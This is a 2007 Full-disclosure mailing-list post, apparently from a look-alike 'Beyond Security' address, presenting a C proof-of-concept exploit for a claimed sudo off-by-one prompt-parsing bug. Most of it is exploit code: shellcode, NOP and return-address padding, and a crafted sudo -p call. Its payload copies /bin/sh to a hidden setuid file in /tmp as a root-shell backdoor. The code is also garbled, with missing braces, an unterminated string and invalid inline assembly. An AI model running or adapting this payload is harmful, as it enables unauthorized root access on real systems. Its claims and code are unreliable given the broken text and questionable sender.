[Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.
- From: Beyond Security <beyondsequritee@xxxxxxxxx>
- Date: Sun, 5 Aug 2007 15:48:13 -0700 (PDT)
* off by one ebp overwrite in sudo prompt parsing
* discovered by beyond security in 2007, thx ge
* to compile: gcc -pipe -o sobo sobo.c ; ./sobo
* please use responsibly! a patch has already been
* sent upstream and a fix will be included in the next
sudo release
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#define SPROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246
#define NOPS_NUM 116
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
void fill (char *buff, int size, unsigned long val) {
unsigned long *ptr = (unsigned long *) buff;
for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
unsigned long get_sp (void) {
__asm__ ("lea esp, %eax");
char *exp (char nops_nums, char rets_nums, char
*shellcode) {
int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
unsigned char *nops = alloca (nops_nums);
unsigned char *rets = alloca (rets_nums);
unsigned long ret = get_sp ();
static char exp_buffer [8192];
/* ensure isatty() fails */
close (0); close (1); close (2);
fill (nops, (unsigned char) nops_nums, 0x90909090);
fill (rets, (unsigned char) rets_nums, ret);
if (size > sizeof (exp_buffer)) {
fprintf (stderr, "buffer is too small\n");
return NULL;
snprintf (exp_buffer, sizeof (exp_buffer),
SPROMPT, nops, shellcode, rets);
return exp_buffer;
int main(int argv, char *argc[]) {
char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
/* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
return 0;